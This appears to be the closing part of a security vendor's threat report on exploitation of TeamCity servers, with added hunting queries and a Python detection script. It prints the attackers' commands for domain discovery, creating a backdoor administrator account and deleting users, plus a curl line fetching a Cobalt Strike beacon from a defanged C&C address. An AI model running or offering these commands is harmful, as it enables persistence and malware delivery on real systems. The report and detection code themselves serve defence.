Executing domain discovery and persistence commands
Aside from malware deployment, we also observed several attempts at network infrastructure discovery and at persistence, carried out through commands spawned by the java.exe process running from a vulnerable TeamCity server's installation directory.
Parent Process:
C:\TeamCity\jre\bin\java.exe
We observed the following subject processes being used for discovery and persistence tactics:
- C:\WINDOWS\system32\naet.exe group /domain
- C:\WINDOWS\system32\naet1.exe localgroup Administratoren /add Default$
- C:\WINDOWS\system32\naet1.exe localgroup Administrators /add Default$
- C:\WINDOWS\system32\naet1.exe user /add Default$ GH{redacted}23gwg
- C:\WINDOWS\system32\naet1.exe user /del defaultuser0
- C:\WINDOWS\system32\naet1.exe user /domain
- C:\WINDOWS\system32\naet1.exe user administrator
- C:\WINDOWS\system32\naet1.exe user default$
- C:\WINDOWS\system32\nltest.exe /domain_trusts
Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorised access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.
Deploying Cobalt Strike beacons
Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.
The beacon was downloaded using the command curl hxxp://83[.]97[.]20[.]141:81/beacon.out -o.conf and was saved in the path C:\TeamCity\bin\.conf.
This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.
Conclusion
The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organisations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.
This malicious activity not only jeopardises the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organisations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.
The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.
- 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
- 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability
- 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
- 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)
- 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
- 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)
| Description | Trend Vision One Query |
|---|---|
| Jasmin ransomware file encryption event | eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc |
| Service installation of the Monero miner's dropped kernel driver, as seen from the registry | eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys |
| Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe | eventSubId:2 and processcmd:IndexStore.bat and objectcmd:("certutil" and "decode") |
| Execution of the SparkRAT malware from the batch file | eventSubId:2 and processFilePath:cmd.exe and processcmd:win.bat and objectcmd:windowDefenSrv |
| Detection of suspicious process invocations from a TeamCity process | eventSubId:2 AND processcmd:TeamCity AND objectcmd:("powershell" OR "net" OR "nltest" OR "msiexec") |
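As an added illustration, not code from the original post or from any Trend product, the following Python hunt applies the idea behind the last query above (suspicious children of TeamCity's java.exe) to constructed process-creation events. Because the binaries seen in the discovery and persistence commands were renamed copies (naet.exe, naet1.exe), the rules key on the net-style arguments rather than only on the image name; the event field names, the rule names and the child-image list are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events modelled on the process tree
# described above; <redacted> stands in for the password the actor supplied.
SAMPLE_EVENTS = [
    {"parent": r"C:\TeamCity\jre\bin\java.exe", "image": r"C:\WINDOWS\system32\naet1.exe",
     "cmd": r"C:\WINDOWS\system32\naet1.exe localgroup Administratoren /add Default$"},
    {"parent": r"C:\TeamCity\jre\bin\java.exe", "image": r"C:\WINDOWS\system32\naet1.exe",
     "cmd": r"C:\WINDOWS\system32\naet1.exe user /add Default$ <redacted>"},
    {"parent": r"C:\TeamCity\jre\bin\java.exe", "image": r"C:\WINDOWS\system32\nltest.exe",
     "cmd": r"C:\WINDOWS\system32\nltest.exe /domain_trusts"},
    # Benign: a build agent launched by the same parent, no net-style arguments.
    {"parent": r"C:\TeamCity\jre\bin\java.exe", "image": r"C:\TeamCity\buildAgent\jre\bin\java.exe",
     "cmd": r"java -jar launcher.jar"},
    # Same discovery command, but not spawned from TeamCity's java.exe.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\WINDOWS\system32\net.exe",
     "cmd": r"net user /domain"},
]

# Parent must be the Java runtime under a TeamCity installation directory.
TEAMCITY_JAVA = re.compile(r"\\teamcity\\.*\\java\.exe$", re.IGNORECASE)

# Child images matching the process names in the hunting query (assumed list).
LOLBIN_CHILDREN = {"net.exe", "net1.exe", "nltest.exe", "powershell.exe", "msiexec.exe"}

# Behaviour rules keyed on the arguments, so a renamed copy of net.exe
# (naet1.exe in the observed activity) is still caught. administrat\w* also
# covers the localised "Administratoren" group name seen in the commands.
ARG_RULES = [
    ("local_admin_add",  re.compile(r"\blocalgroup\s+administrat\w*\s+/add\b", re.I)),
    ("account_created",  re.compile(r"\buser\s+/add\b", re.I)),
    ("account_deleted",  re.compile(r"\buser\s+/del\b", re.I)),
    ("domain_discovery", re.compile(r"/domain_trusts\b|\b(?:user|group)\s+/domain\b", re.I)),
]

def classify(event: dict) -> list[str]:
    """Rule names the event triggers; empty unless the parent is TeamCity's java.exe."""
    if not TEAMCITY_JAVA.search(event["parent"]):
        return []
    hits = [name for name, rx in ARG_RULES if rx.search(event["cmd"])]
    child = PureWindowsPath(event["image"]).name.lower()
    if child in LOLBIN_CHILDREN:
        hits.append(f"lolbin_child:{child}")
    return hits

def hunt(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Pair every flagged command line with the rules it matched, in input order."""
    return [(e["cmd"], hits) for e in events if (hits := classify(e))]
```

Running hunt(SAMPLE_EVENTS) flags the three actor commands and neither the build-agent launch nor the net command with a non-TeamCity parent.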